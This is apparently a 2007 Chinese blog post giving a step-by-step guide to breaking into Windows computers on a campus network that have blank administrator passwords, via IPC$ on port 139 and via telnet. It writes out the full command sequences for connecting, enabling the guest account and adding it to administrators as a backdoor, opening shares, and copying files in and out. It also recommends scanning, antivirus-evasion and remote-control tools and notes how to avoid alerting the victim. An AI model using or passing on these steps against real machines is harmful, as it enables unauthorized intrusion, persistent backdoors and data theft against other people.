学步园

1.用139端口(IPC$)入侵 (我不常用,好像很难成功)
一.
　　先用"NTscan变态扫描器"扫描局域网某一网段(我这里只要是校园网内的就行)的IP,使用WMI扫描,端口139,得到一些弱口令(用户名为administrator,密码为空)的IP,使用cmd.exe,用net use //IP/IPC$ "" /user:administrator,但是绝大部分电脑都提示说:"发生系统错误 53。找不到网络路径。"我想可能是被对方防火墙拦截了.只有极个别能连上.
net use //218.168.0.1/IPC$ "" /user:administrator    提示“命令成功完成”,建立好了IPC$(远程管理连接)
二.
net time //192.168.0.1         显示远程主机的当前时间,显示时间为05:00
at //192.168.0.1 05:00 telnet    用at命令启动远程主机的telnet服务,但我用了可是没成功(也可用我得电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动,就OK了)
telnet 192.168.0.1        telnet上去
administrator        键入y后,输入的用户名,密码为空
三.
net user       查看用户,如:administrator,guest, HelpAssistant
net user guest /active:yes    激活guest用户
net user guest ***     更改guest的密码为***
net localgroup administrators guest /add      把guest的权限提升为管理员权限,为以后入侵留后门
四.
net share admin$      net share E$          开共享,默认都是共享的
net share c$ /del     用来关闭共享的
net u** *//192.168.0.1/c$ "" /user:administrator     映射远程主机c$盘到本地x盘,这个我也没成功
五
　　使用"远程监控软件dameware"控制这台电脑.
六.
exit     断开远程主机的连接(没什么用,我都是直接关掉窗口的)

2.用23端口(telnet)入侵
一.(与上二大同)
　　先用"局域网查看工具V1.60"查看弱口令并开了23端口的,也可以只找到弱口令的主机,然后每个IP都按照电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动的方式开启telnet,再在cmd.exe中输入telnet IP,连不起的会出现"不能打开到主机的连接， 在端口 23: 连接失败",当然有些是开了23端口,但由于防火墙阻止了.
telnet 192.168.0.1        telent上去
administrator        输入y后,输入的用户名,密码为空
二.(同上三)
net user       查看用户 :administrator,guest, HelpAssistant
net user guest /active:yes    激活guest用户
net user guest ****     更改guest的密码为****
net localgroup administrators guest /add      把guest的权限提升为管理员权限
三.
net share ipc$  net share admin$   net share E$         开共享,默认都是共享的,ipc$一定要开,以便下一步net use //192.168.0.1/IPC$ "" /user:administrator       建立IPC$(远程管理连接)
四.
　　使用"远程监控软件dameware"控制这台电脑.

　　附:
　　1.共享信息
net share e=e:  将远程主机的E盘共享, 访问时只需输入//192.168.136./e
net share c=c:/winnt/system       共享system文件夹
net share e /del     关闭E盘共享
　　2.telnet命令(DOS命令),在网上搜,太多了
dir d:/   查看D盘  dir d:/PROGRA~1/   即program file文件夹,取前6个字母加上~符号,后面再加上数字1shutdown -s -t 60（60秒倒记时关机）opy复制文件 DEL删除 MKDIR创建目录 format格式化硬盘 IPCONFIG /ALL查看所有IP信息  NETSTAT -AN查看端口
　　3.ipc$常用命令,也在网上搜,也很多
copy c:/x.exe //192.168.0.1/c$     即将c盘下的xinxin.exe复制到对方c盘内,这个我没弄成功
copy //192.168.0.1/c$/x.exe c:/    将远程主机上的文件复制到自己的机器里
　　4.软件信息
　　一.远程开启telent服务的软件:"Recton--D贺免杀专用版",这个软件很好用,只需要远程主机IP和用户名密码,就可开telent,只可惜要被我金山毒霸杀掉,每次用它都要将实时防毒关掉.
　　二."远程监控软件dameware",这个软件很好,可以控制对方电脑就像在自己机子上操作一样,十分方便,具体教程网上去找,美中不足的是,每次连接上远程主机后,它都要在对方电脑上弹出连接提示窗口,还发出"当"的一声,除非对方又聋又瞎,不然都会被发现.(虽然我已把Additional Settings下的Enable SysTray Icon,和Notify Dialog下的Notify on Connection钩掉了都这样),所以着问题解决不了,这个软件就不要轻易使用.
　　三.端口扫描软件,这就太多了,网上一搜一大堆,也不晓得哪些好,我这里有"s扫描器","NTscan变态扫描器","流光5.0","hscan120扫描器"等

　　注:不要用来搞破坏哈.仅供娱乐!想上传木马的自己到网上找资料.

　　乱世狂人 2007.3.4
　　首发地址：http://user.qzone.qq.com/164701150/blog/7